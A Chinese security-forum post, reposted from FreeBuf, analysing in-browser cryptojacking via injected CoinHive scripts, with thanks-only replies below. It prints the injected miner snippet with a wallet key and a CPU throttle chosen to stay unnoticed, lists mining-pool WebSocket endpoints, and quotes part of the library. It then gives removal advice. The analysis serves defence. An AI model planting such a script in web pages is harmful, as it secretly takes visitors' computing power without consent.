吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 42123|回复: 155
收起左侧

[转载] 如何避免网页被挖矿

    [复制链接]
丶小蓝丶 发表于 2018-8-18 16:40
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 丶小蓝丶 于 2018-8-18 16:42 编辑
0×0背景

      上一期分享了一篇软件的挖矿记录本次分享同样是来自于大神si1ence的一篇分享
挖矿目前已经成为黑帽子牟利的主要手段,最近上网偶然间发现部分网站被挂马后存在网页挖矿的行为,区别于常规病毒操作系统中挖矿行为,网页主要在网站上挂上恶意的JS脚本,访问该网站即触发挖矿动作。目前很多网页挖矿主要以CoinHive的方式较多,一般挖矿用户以主动方式直接使用C或者其他语言构造的miner客户端进行CPU或GPU计算Hash。前端挖矿用户以被动或主动方式在不知情或知情情况下利用浏览者的CPU或GPU。
0×1现象
图片请点击查看大图
访问恶意网站时CPU飙升,关闭网站后回复正常水平。

关闭之后:
0×2源代码分析

查看网页源代码可发现部分挖矿的代码,经过简单确定非手机浏览器后,即开始挖矿的动作。

浏览器进程占用了较大的CPU资源:

查看浏览器进程中,可以在内存地址中发现有挖矿地址的痕迹:

主要引用的挖矿代码的详细都在引用的JS脚本当中,仅使用70%的CPU资源。
[Asm] 纯文本查看 复制代码
<#script src="https://coinhive.com/lib/coinhive.min.js">
 
 var miner = new CoinHive.Anonymous('Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt', {throttle: 0.7});
 if (!miner.isMobile() && !miner.didOptOut(14400)) {
 miner.start();
}
<#/script>

Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt:CoinHive 当中的钱包地址;throttle:浏览器占用CPU的阈值,调节到合适的阈值时用户会很难注意到浏览器的算力被滥用。coinhive.min.js源码如下:
挖矿脚本使用WebSocket与矿池进行通信,部分的矿池结点如下:
[Asm] 纯文本查看 复制代码
wss://ws001.coinhive.com/proxy  
 
wss://ws002.coinhive.com/proxy  
 
wss://ws003.coinhive.com/proxy  
 
wss://ws004.coinhive.com/proxy  
 
wss://ws005.coinhive.com/proxy  
 
wss://ws006.coinhive.com/proxy  
 
wss://ws007.coinhive.com/proxy  
 
wss://ws008.coinhive.com/proxy  
 
wss://ws009.coinhive.com/proxy  
 
wss://ws010.coinhive.com/proxy  
 
wss://ws011.coinhive.com/proxy  
 
wss://ws012.coinhive.com/proxy
 


挖矿脚本允许自动调节线程数目:
[Asm] 纯文本查看 复制代码
this._throttle=Math.max(0,Math.min(.99,this.params.throttle||0));
 
this._stopOnInvalidOptIn=false;
 
this._waitingForAuth=false;
 
this._selfTestSuccess=false;
 
this._verifyThread=null;
 
this._autoThreads={
 
enabled:!!this.params.autoThreads,
 
interval:null,
 
adjustAt:null,
 
adjustEvery:1e4,
 
stats:{}
 
};
 
this._tab={
 
ident:Math.random()*16777215|0,
 
mode:CoinHive.IF_EXCLUSIVE_TAB,g
 
race:0,
 
waitReconnect:0,
 
lastPingReceived:0,
 
interval:null
 
};
0×3 解决方法:

1.根据页面后查看网页源代码,搜索有关于CoinHive,Miner等关键字可以快速定位到界面,使用记事本或者网页编辑器删除挖矿的关键代码。
2.使用目前一切所谓的浏览器进行拦截挖矿代码
3.访问小电影网站时候多留心自己的CPU性能。

*本文作者si1ence,转载来自FreeBuf.COM

免费评分

参与人数 28吾爱币 +18 热心值 +24 收起 理由
yewei123 + 1 热心回复!
浩轩baby + 1 谢谢@Thanks!
cmms + 1 谢谢@Thanks!
小呆南瓜 + 1 + 1 谢谢@Thanks!
糖果的幻想 + 1 + 1 我很赞同!
Y33 + 1 + 1 用心讨论,共获提升!
et124 + 1 + 1 谢谢@Thanks!
明媚的她 + 1 我很赞同!
woditian + 1 谢谢@Thanks!
jcai56 + 1 + 1 谢谢@Thanks!
恬淡为上 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
MaxWil + 1 + 1 谢谢@Thanks!
西式蛋糕 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
梦古无疆 + 1 谢谢@Thanks!
JackeryFlow + 1 + 1 谢谢@Thanks!
1000Y + 1 用心讨论,共获提升!
huangbo + 1 热心回复!
静叶流云 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
siuhoapdou + 1 + 1 谢谢@Thanks!
tais + 1 + 1 谢谢@Thanks!
多幸运遇见baby + 1 我很赞同!
qiao0208 + 1 + 1 我很赞同!
lbmtl + 1 + 1 前段时间爱奇艺b站看十几秒后GPU占用异常而且搜狗进程cpu占用异常
voyage1969 + 1 我很赞同!
Hegemonism + 1 用心讨论,共获提升!
A3uRa + 1 谢谢@Thanks!
Air丶空 + 1 + 1 用心讨论,共获提升!
dina-sam + 1 我很赞同!

查看全部评分

本帖被以下淘专辑推荐:

  • · 杂项|主题: 134, 订阅: 15

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

goldengod 发表于 2018-8-18 17:07
我是来澄清 看帖子的目的不是为了小电影
hellowmykami 发表于 2018-8-19 02:58
Dream漂移 发表于 2018-8-18 17:08
丨皮卡丘丶 发表于 2018-8-18 16:57
楼主你这么看着我,我不好意思不顶帖啊
dina-sam 发表于 2018-8-18 16:58
先记住这个再说,coinhive
darkmacan 发表于 2018-8-18 17:00
分析的很詳細,圖文並茂,最近挖礦還是很流行哦!
本泽马 发表于 2018-8-18 17:01
这似乎麻烦的一点
13246685106 发表于 2018-8-18 17:02
分析的很詳細
Pedro 发表于 2018-8-18 17:04
感谢分享 受教了
akeagle 发表于 2018-8-18 17:16
路过学习了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 22:57

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表